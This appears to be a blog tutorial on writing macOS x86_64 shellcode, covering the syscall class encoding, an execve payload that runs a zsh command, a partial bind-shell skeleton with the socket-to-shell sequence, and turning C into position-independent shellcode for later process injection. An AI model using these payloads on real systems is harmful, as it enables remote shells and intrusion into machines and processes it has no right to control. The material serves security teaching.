Writing macOS Shellcode From Scratch: Syscalls, Bind Shells, and the 0x2000000 Trick

Shellcode is the payload that runs after the bug. The vulnerability gets you control of execution; the shellcode is what you do with it. On macOS that usually means popping a shell, reverse or bind, but it can be anything: spawn a process, write a file, load a dylib. The constraint that shapes everything is position. Shellcode runs wherever it lands, so it cannot assume a fixed address for itself or anything it touches. No hardcoded pointers, no linker, no loader doing your relocations. Just registers, the stack, and the kernel.

This post builds macOS shellcode from nothing: first the syscall mechanism and the one encoding quirk that separates macOS from Linux, then a command-execution payload via execve, then a bind shell, and finally the trickier business of writing shellcode in C and stripping out everything the compiler adds that would break it. Everything here uses the previous post’s toolkit (DTrace to confirm the right syscalls fire, LLDB to step the payload), so this is where the reading turns into writing.

Syscalls and the One Quirk That Matters

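A system call is how user code asks the kernel to do something privileged: open a file, create a socket, replace the running image. To make one on x86_64 you load a syscall number into RAX, put the arguments in RDI, RSI, RDX, R10, R8, and R9, in that order, and execute the syscall instruction.¹ That is the AMD64 function-call register order with one substitution: R10 stands in for RCX, because the syscall instruction itself overwrites RCX (with the return address) and R11 (with RFLAGS).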

That much is identical to Linux. Here is what is not. macOS supports several classes of syscall (BSD, Mach, Mach IPC, machine-dependent) and the class is encoded into the number itself.² The class lives in the high byte: it is shifted left by SYSCALL_CLASS_SHIFT (24). Traditional BSD syscalls, the ones you want for shells and files, carry class 2 (SYSCALL_CLASS_UNIX), and 2 << 24 is 0x2000000. So the real number you load into RAX is 0x2000000 + bsd_number.
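The encoding is simple enough to check in a few lines of C. The sketch below restates the constants locally, with names borrowed from osfmk/mach/i386/syscall_sw.h but defined here so it compiles on any host; the helper functions are hypothetical, not part of any Apple API.

```c
// filename: syscall-class.c
#include <assert.h>
#include <stdint.h>

/* Local re-statement of the XNU encoding; defined here, not included. */
#define SYSCALL_CLASS_SHIFT 24
#define SYSCALL_CLASS_MASK  (0xFFu << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK (~SYSCALL_CLASS_MASK)
#define SYSCALL_CLASS_UNIX  2u   /* traditional BSD syscalls */

/* Value to load into RAX for a BSD syscall number from syscalls.master. */
static uint32_t bsd_syscall_rax(uint32_t bsd_number) {
    assert((bsd_number & SYSCALL_CLASS_MASK) == 0);  /* must fit below the class byte */
    return (SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | (bsd_number & SYSCALL_NUMBER_MASK);
}

/* Split a RAX value back into class and number, e.g. to sanity-check a payload. */
static uint32_t syscall_class(uint32_t rax)  { return (rax & SYSCALL_CLASS_MASK) >> SYSCALL_CLASS_SHIFT; }
static uint32_t syscall_number(uint32_t rax) { return rax & SYSCALL_NUMBER_MASK; }
```

A Linux-style 0x3b decodes to class 0 rather than the BSD class 2: that is the missing 0x2000000 in one line.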

The BSD numbers come from XNU’s bsd/kern/syscalls.master. A few that matter:

# filename: syscalls.master (excerpt)
 1   exit       4   write      30  accept     59  execve
 90  dup2       97  socket     98  connect    104 bind       106 listen

So execve is BSD 59 (0x3b), and the value you actually load is 0x200003b. Forget the 0x2000000 and your syscall silently does the wrong thing or faults; it is the single most common mistake when porting Linux shellcode habits to macOS. A minimal payload that writes “hi” and exits:

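; filename: hello.asm   (assemble with: nasm -f macho64 hello.asm)
bits 64
global _main
section .text
_main:
    mov     rax, 0x2000004   ; write  (BSD 4 | class 2)
    mov     rdi, 1           ; fd = stdout
    mov     rbx, 'hi'        ; value 0x6968: "hi" followed by six zero bytes
    push    rbx
    mov     rsi, rsp         ; buf = pointer to "hi" on the stack
    mov     rdx, 2           ; len = 2
    syscall

    mov     rax, 0x2000001   ; exit (BSD 1 | class 2)
    mov     rdi, 0           ; status = 0
    syscall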

Notice there is no .data section, no string constant living at a known address. The string “hi” is pushed onto the stack at runtime and RSI points at it wherever the stack happens to be. That is the discipline of shellcode in miniature: build your data on the stack, point at it with the stack pointer, never name an absolute address.
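The only non-obvious part of building strings this way is the immediate itself. NASM treats a character constant like 'hi' or '/bin/zsh' as a little-endian integer, first character in the lowest byte, so a push lays the characters down in reading order. The helper below (a hypothetical name) computes that value, which is handy when checking a disassembly or writing the constant as hex:

```c
// filename: nasm-string-imm.c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Integer value of a NASM character constant such as 'hi' or '/bin/zsh':
 * the first character ends up in the lowest byte. On little-endian x86_64,
 * "mov rbx, imm / push rbx" therefore stores the characters in order. */
static uint64_t nasm_char_const(const char *s) {
    size_t len = strlen(s);
    assert(len <= 8);                 /* one register holds at most 8 bytes */
    uint64_t v = 0;
    for (size_t i = len; i-- > 0;)    /* last character goes into the high end */
        v = (v << 8) | (uint8_t)s[i];
    return v;
}
```

'hi' comes out as 0x6968, and the six zero bytes above it make the pushed copy NUL-terminated for free. An exactly eight-byte string such as '/bin/zsh' (0x68737a2f6e69622f) has no room for the terminator, which is why the execve pattern later pushes a zero qword before it.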

Verify with DTrace, not faith. syscall:::entry /execname == "yourbinary"/ { printf("%s\n", probefunc); } prints every syscall the process makes, in order. The loader's startup calls show up first, so look at the tail of the trace: if write and exit appear there, the encoding is right. If they are missing, the 0x2000000 is the first thing to check.
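The syscalls.master excerpt translates into RAX values mechanically. A minimal lookup sketch, with the table copied from that excerpt and the helper name rax_for invented for illustration:

```c
// filename: bsd-syscalls.c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* BSD numbers from the syscalls.master excerpt. */
struct bsd_syscall { const char *name; uint32_t number; };

static const struct bsd_syscall kBsdSyscalls[] = {
    { "exit", 1 },   { "write", 4 },   { "accept", 30 },  { "execve", 59 },
    { "dup2", 90 },  { "socket", 97 }, { "connect", 98 },
    { "bind", 104 }, { "listen", 106 },
};

/* RAX value for a named BSD syscall (class 2 in the high byte), or 0 if not in the table. */
static uint32_t rax_for(const char *name) {
    assert(name != NULL);
    for (size_t i = 0; i < sizeof kBsdSyscalls / sizeof kBsdSyscalls[0]; i++) {
        if (strcmp(kBsdSyscalls[i].name, name) == 0)
            return 0x2000000u + kBsdSyscalls[i].number;
    }
    return 0;
}
```

For the calls used in this post that gives execve 0x200003b, socket 0x2000061, bind 0x2000068, listen 0x200006a, accept 0x200001e, and dup2 0x200005a.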

Executing a Command With execve

Running an arbitrary command is one syscall: execve(path, argv, envp), which replaces the current process image with a new one. The clean way to run a shell command is to invoke a shell with -c:

// filename: target-call.c
#include <unistd.h>
int main(void) {
    char *argp[] = { "/bin/zsh", "-c", "touch /tmp/mynewfile.txt", NULL };
    return execve("/bin/zsh", argp, NULL);   // only returns (with -1) if the exec fails
}

We use /bin/zsh because Apple made zsh the default shell in Catalina; it is reliably present. execve wants three things in registers: RDI pointing at the path string, RSI pointing at the argv array, and RDX for envp (which we can leave NULL). The whole job is constructing those two structures on the stack with no fixed addresses.

The key insight is that the stack grows downward, so arrays must be assembled backwards: you push the last element first. The argv array is NULL-terminated, so NULL goes down first, then a pointer to the command string, then a pointer to -c, then a pointer to /bin/zsh, which leaves argv[0] on top. Each of those pointers has to point at a string you also placed on the stack. The pattern for one string:

; filename: execve-string.asm
    xor     rdx, rdx          ; RDX = 0, our reusable NULL
    push    rdx               ; NULL-terminate the string on the stack
    mov     rbx, '/bin/zsh'   ; 8 bytes, fits one register
    push    rbx               ; "/bin/zsh\0" now sits on the stack
    mov     rdi, rsp          ; RDI -> the string (execve's first arg)

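You repeat that idea for -c and the command, saving each string’s stack address into a temporary register. The command is longer than one register, so it goes down as several 8-byte pushes, last chunk first, on top of its terminating zero qword. Then you build the argv array itself by pushing those saved pointers (NULL first, then the command pointer, then the -c pointer, then the /bin/zsh pointer) and point RSI at the top. With RDX still zero for envp, load RAX with 0x200003b, fire syscall, and the process becomes your command.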
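The push order is easy to get backwards, so it can help to model it off-target first. This sketch simulates the stack as an array of 8-byte slots growing toward index 0 (toy_stack and its helpers are hypothetical names, and the model captures only ordering, nothing else about the real stack), then builds the strings and argv in the same order as the assembly:

```c
// filename: argv-on-stack.c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy x86_64 stack: pointer-sized slots growing toward index 0,
 * so &slot[top] plays the role of RSP. */
_Static_assert(sizeof(char *) == 8, "model assumes 64-bit pointers");
enum { SLOTS = 32 };

typedef struct {
    char  *slot[SLOTS];
    size_t top;                      /* SLOTS means empty */
} toy_stack;

static void toy_init(toy_stack *s) { s->top = SLOTS; }

/* Like "mov rbx, imm64 / push rbx": 8 raw bytes. */
static void push_bytes(toy_stack *s, const char bytes[8]) {
    assert(s->top > 0);
    memcpy(&s->slot[--s->top], bytes, 8);
}

/* Like "push rdi" after "mov rdi, rsp": one pointer. */
static void push_ptr(toy_stack *s, char *p) {
    assert(s->top > 0);
    s->slot[--s->top] = p;
}

/* Zero qword first, then 8-byte chunks from last to first.
 * Returns what "mov reg, rsp" would yield: a pointer to the string. */
static char *push_string(toy_stack *s, const char *str) {
    static const char zero[8] = {0};
    size_t len = strlen(str);
    push_bytes(s, zero);
    for (size_t off = (len + 7) / 8 * 8; off >= 8; off -= 8) {
        char chunk[8] = {0};
        size_t start = off - 8;
        size_t n = len - start < 8 ? len - start : 8;
        memcpy(chunk, str + start, n);
        push_bytes(s, chunk);
    }
    return (char *)&s->slot[s->top];
}

/* Strings first, then argv pushed NULL-first so argv[0] ends on top. */
static char **build_argv(toy_stack *s, const char *command) {
    char *path   = push_string(s, "/bin/zsh");
    char *dash_c = push_string(s, "-c");
    char *cmd    = push_string(s, command);
    push_ptr(s, NULL);               /* argv[3]: terminator goes down first */
    push_ptr(s, cmd);                /* argv[2] */
    push_ptr(s, dash_c);             /* argv[1] */
    push_ptr(s, path);               /* argv[0] */
    return &s->slot[s->top];         /* what RSI would hold */
}
```

Because every string is pushed before the argv entries, the later pushes land below the strings and never overwrite them. The 24-byte command goes down as "file.txt", then "mp/mynew", then "touch /t".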

A small but real optimization, because shellcode size sometimes matters: mov rdi, rsp assembles to three bytes (48 89 e7), while push rsp / pop rdi does the same job in two (54 5f). When a buffer is tight, those single bytes decide whether the payload fits. When it is not, clarity wins.

A Bind Shell in Assembly

A command-exec payload is fine when you already have a channel. When you do not, you want a shell listening on a socket. A bind shell is a sequence of socket syscalls glued to an execve, and writing it by hand is the best way to internalize how Berkeley sockets actually work at the syscall level:

socket(AF_INET, SOCK_STREAM, 0), BSD 97: create a TCP socket. The returned file descriptor is the thread you have to keep hold of across every following call; stash it somewhere stable like R8, because RAX gets clobbered by the next syscall.
bind(fd, &sockaddr, len), BSD 104: bind it to an address and port. The sockaddr_in struct is, again, built on the stack and pointed at. On macOS it starts with a one-byte length field (sin_len) ahead of the one-byte family, followed by the port and the address. The port is stored in network byte order, so on little-endian x86_64 its two bytes must be swapped in the immediate you push.
listen(fd, backlog), BSD 106: start accepting connections.
accept(fd, 0, 0), BSD 30: block until a client connects; this returns a new fd for the connection.
dup2(clientfd, n) for n in 0, 1, 2, BSD 90: wire the client socket onto stdin, stdout, and stderr. This is the step that makes the eventual shell actually talk over the network.
execve("/bin/zsh", ...), BSD 59: now zsh reads from and writes to the socket.

; filename: bindshell-skeleton.asm
    ; socket(AF_INET=2, SOCK_STREAM=1, 0)
    mov     rax, 0x2000061    ; socket (BSD 97)
    mov     rdi, 2
    mov     rsi, 1
    xor     rdx, rdx
    syscall
    mov     r8, rax           ; save the listening fd before RAX is reused
    ; ... bind, listen, accept ...
    ; dup2 loop wiring the client fd to fds 0,1,2
    ; execve /bin/zsh

The discipline that makes or breaks this is file-descriptor bookkeeping. Every syscall returns into RAX, so the socket fd you got from socket is gone the instant you call bind. Save it first, and not in RCX or R11, which the syscall instruction itself overwrites. The same applies to the client fd from accept. Most broken bind shells are not exotic failures: they are a clobbered file descriptor. Step it in LLDB and watch R8.
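The bind argument the skeleton leaves out, and the one that is easiest to get wrong, is the sockaddr_in. This sketch spells out the 16-byte macOS layout and computes the qword a push would need; port 4444 and INADDR_ANY in the usage below are arbitrary examples, and the function names are hypothetical:

```c
// filename: sockaddr-qword.c
#include <assert.h>
#include <stdint.h>

/* Byte layout of macOS's 16-byte struct sockaddr_in, which (unlike Linux)
 * begins with a one-byte sin_len:
 *   [0] sin_len  [1] sin_family  [2..3] sin_port  [4..7] sin_addr  [8..15] sin_zero
 * Port and address are in network (big-endian) byte order. */
static void macos_sockaddr_in(uint8_t out[16], uint16_t port, uint32_t addr) {
    out[0] = 16;                       /* sin_len: this sketch uses the struct size */
    out[1] = 2;                        /* sin_family = AF_INET */
    out[2] = (uint8_t)(port >> 8);     /* high byte first: network order */
    out[3] = (uint8_t)(port & 0xff);
    for (int i = 0; i < 4; i++)
        out[4 + i] = (uint8_t)(addr >> (24 - 8 * i));
    for (int i = 8; i < 16; i++)
        out[i] = 0;                    /* sin_zero */
}

/* Immediate that, pushed on little-endian x86_64, lays down b[0..7] in order. */
static uint64_t le_qword(const uint8_t b[8]) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | b[i];
    return v;
}
```

For port 4444 (0x115c) on 0.0.0.0, the first qword is 0x5c110210 and the second (sin_zero) is 0, so the assembly would push the zero qword first, then 0x5c110210, and pass RSI = RSP and RDX = 16 to bind.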

Shellcode in C, and Fighting the Compiler

Hand-assembly is precise but slow and error-prone. Writing the logic in C and compiling it is faster, but a compiler emits code that assumes it is a normal program, and several of those assumptions are fatal to shellcode. The work is in stripping them out.

Two big ones on macOS x86_64:

RIP-relative addressing. When C references a global string or variable, the compiler emits a load relative to the instruction pointer: lea rax, [rip + offset]. Inside a normal binary that works at any base address, because the loader slides the whole image, code and data together, so the distance between them never changes. Shellcode breaks that assumption: you extract only the __text bytes, so the data the offset was computed to reach is not there, and the instruction reads whatever happens to sit at that distance from wherever the payload landed. The fix is to eliminate RIP-relative references entirely: keep data on the stack instead of in global sections, exactly like the assembly version does. No globals, no __cstring or __DATA contents, nothing the compiler would address relative to RIP.

Calls into the __stubs section. Call a libc function like execv from C and the compiler routes the call through a small stub in __stubs, which jumps through a pointer the dynamic linker fills in at load time. In shellcode there is no linker pass and no __stubs section travelling with the payload, so the call lands on a dangling jump. The workaround is to bypass the stub and call the function directly: obtain the real address of execv at runtime (for example, handed over by whatever injects the payload) and call through a function pointer, so the compiled code contains an indirect call and never touches the __stubs indirection.
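Put together, the two rules look roughly like this in C. It is a sketch under stated assumptions: the execv pointer arrives as a parameter from a hypothetical injector, every string is stored from immediates into locals (little-endian constants, matching x86_64), and recording_execv is a test double for trying the logic off-target, not part of the payload:

```c
// filename: payload-fnptr.c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical contract: the injector passes a resolved execv, so the
 * compiled call is an indirect "call reg", not a jump into __stubs. */
typedef int (*execv_fn)(const char *path, char *const argv[]);

/* No globals, no string literals: bytes come from immediates stored into locals. */
int payload(execv_fn execv_ptr) {
    uint64_t path[2], dash_c[1], cmd[4];
    path[0]   = 0x68737a2f6e69622fULL;   /* "/bin/zsh" */
    path[1]   = 0;                       /* terminator */
    dash_c[0] = 0x632dULL;               /* "-c" plus zero padding */
    cmd[0]    = 0x742f206863756f74ULL;   /* "touch /t" */
    cmd[1]    = 0x77656e796d2f706dULL;   /* "mp/mynew" */
    cmd[2]    = 0x7478742e656c6966ULL;   /* "file.txt" */
    cmd[3]    = 0;                       /* terminator */

    char *argv[4];
    argv[0] = (char *)path;
    argv[1] = (char *)dash_c;
    argv[2] = (char *)cmd;
    argv[3] = NULL;
    return execv_ptr((char *)path, argv);
}

/* Off-target test double: copies what the payload would have executed. */
static char seen_path[32], seen_argv[4][32];
static int seen_argc;

static int recording_execv(const char *path, char *const argv[]) {
    strncpy(seen_path, path, sizeof seen_path - 1);
    seen_argc = 0;
    while (seen_argc < 4 && argv[seen_argc] != NULL) {
        strncpy(seen_argv[seen_argc], argv[seen_argc], sizeof seen_argv[0] - 1);
        seen_argc++;
    }
    return 0;
}
```

Even written this way, an optimizing compiler is free to fold those stores into a constant-pool load through RIP, so the disassembly audit still decides whether the result is usable.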

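// filename: c-shellcode-notes.c
// Compile with optimizations and no stack protector (e.g. clang -O2 -fno-stack-protector):
// the protector loads ___stack_chk_guard with a RIP-relative GOT access and calls
// ___stack_chk_fail through a stub, reintroducing both problems. Then extract __text.
// Audit the disassembly (for example with otool -tV) for two things that must NOT appear:
//   - any  lea/mov reg, [rip + ...]  (RIP-relative data reference)
//   - any  call <stub>              (lazy-bound import)
// If either survives, the payload breaks the moment it runs relocated.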

The honest summary: writing shellcode in C does not save you from understanding the assembly; it just changes your job from writing it to auditing it. You compile, disassemble, find the constructs the compiler added that assume a loader, and surgically remove them until the __text section is genuinely position-independent. That review loop is its own skill, and it is where most of the time goes.
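Part of that loop can be automated with a crude pre-filter. The scanner below (hypothetical, and deliberately naive) walks an extracted __text blob looking for byte patterns shaped like a REX.W lea with a RIP-relative ModRM, and for call rel32 instructions whose target falls outside the blob, which is where a __stubs call would point. x86 is variable-length, so a byte scan can misfire in both directions; it only tells you where to look in the real disassembly:

```c
// filename: riprel-scan.c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    size_t rip_lea;        /* REX.W 8D /r with mod=00, r/m=101: lea r64, [rip + disp32] */
    size_t call_outside;   /* E8 rel32 whose target lies outside the blob */
} scan_result;

static scan_result scan_text(const uint8_t *code, size_t len) {
    scan_result r = {0, 0};
    for (size_t i = 0; i < len; i++) {
        /* REX.W prefixes are 0x48-0x4F; in 64-bit mode mod=00, r/m=101 means RIP-relative. */
        if (i + 2 < len && (code[i] & 0xF8) == 0x48 &&
            code[i + 1] == 0x8D && (code[i + 2] & 0xC7) == 0x05)
            r.rip_lea++;

        if (code[i] == 0xE8 && i + 5 <= len) {
            uint32_t u = (uint32_t)code[i + 1] | (uint32_t)code[i + 2] << 8 |
                         (uint32_t)code[i + 3] << 16 | (uint32_t)code[i + 4] << 24;
            /* Sign-extend the little-endian disp32 without implementation-defined casts. */
            int64_t rel = (u & 0x80000000u) ? (int64_t)u - 0x100000000LL : (int64_t)u;
            int64_t target = (int64_t)i + 5 + rel;    /* relative to the next instruction */
            if (target < 0 || target >= (int64_t)len)
                r.call_outside++;
        }
    }
    return r;
}
```

A call to a helper inside the blob is fine and is not counted; only calls that leave the extracted bytes are, since those are the ones that can only make sense in the original binary.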

Why This Matters

Everything in this post is plumbing for the rest of the series. The injection posts (DYLD, dylib hijacking, Mach task ports) all need a payload to inject, and that payload is shellcode built on exactly these rules: position-independent, stack-constructed, 0x2000000-encoded. The BlockBlock case study later injects execv shellcode into a security product’s process, and that shellcode is exactly the kind built here. When a privilege-escalation chain ends in “and then we run our payload as root,” this is the payload.

The deeper point is the mindset. Shellcode forces you to think about code with no fixed address, data you carry with you, and a kernel interface you talk to in raw register conventions. That same discipline (assume nothing about layout, build what you need at runtime, verify with DTrace) is the discipline of every exploit that follows. Next we use it: getting a payload into a process we do not own, starting with the oldest trick in the macOS book, dylib injection.

References

¹ System V Application Binary Interface, AMD64 Architecture Processor Supplement (x86-64 calling convention).
² Apple, XNU source: bsd/kern/syscalls.master and osfmk/mach/i386/syscall_sw.h, XNU 7195.50.7.100.1, opensource.apple.com.